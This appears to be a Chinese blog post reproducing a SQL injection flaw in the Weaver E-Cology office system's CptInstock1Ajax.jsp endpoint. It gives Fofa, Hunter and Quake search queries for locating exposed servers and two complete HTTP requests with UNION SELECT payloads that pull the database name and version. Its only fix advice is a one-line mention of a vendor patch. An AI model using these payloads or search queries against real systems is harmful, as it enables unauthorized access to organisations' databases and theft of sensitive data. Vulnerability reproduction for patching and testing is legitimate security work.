泛微E-Cology系统 CptInstock1Ajax SQL注入漏洞复现

0x01 产品描述:

‌ **泛微E-Cology是一款专为中大型组织设计的数字化办公系统,旨在创建高效协同的办公环境。**‌ 该系统集成了智能化、平台化和全程数字化的特点,通过智能语音交互、与其他异构系统的集成以及电子印章、电子签名等技术的应用,实现了组织的全面数字化转型‌

0x02 漏洞描述:

泛微 E-Cology OA协同商务系统前台CptInstock1Ajax接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

0x03 搜索语句:

Fofa:app="泛微-OA(e-cology)"

Hunter:body="/wui/common/page/sysRemind.jsp"

Quake:body="/wui/common/page/sysRemind.jsp"

0x04 漏洞复现:

数据库查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+DB_Name(),1# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

版本查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x05 修复建议:

厂商已发布补丁 请及时修复。

相关推荐
薄荷椰果抹茶2 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
运维开发王义杰10 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习12 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
加密狗复制模拟13 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
galaxylove14 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu14 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司15 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
小能喵16 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux
浩浩测试一下1 天前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Fortinet_CHINA1 天前
工业网络安全新范式——从风险可见性到量化防御的进化
安全·web安全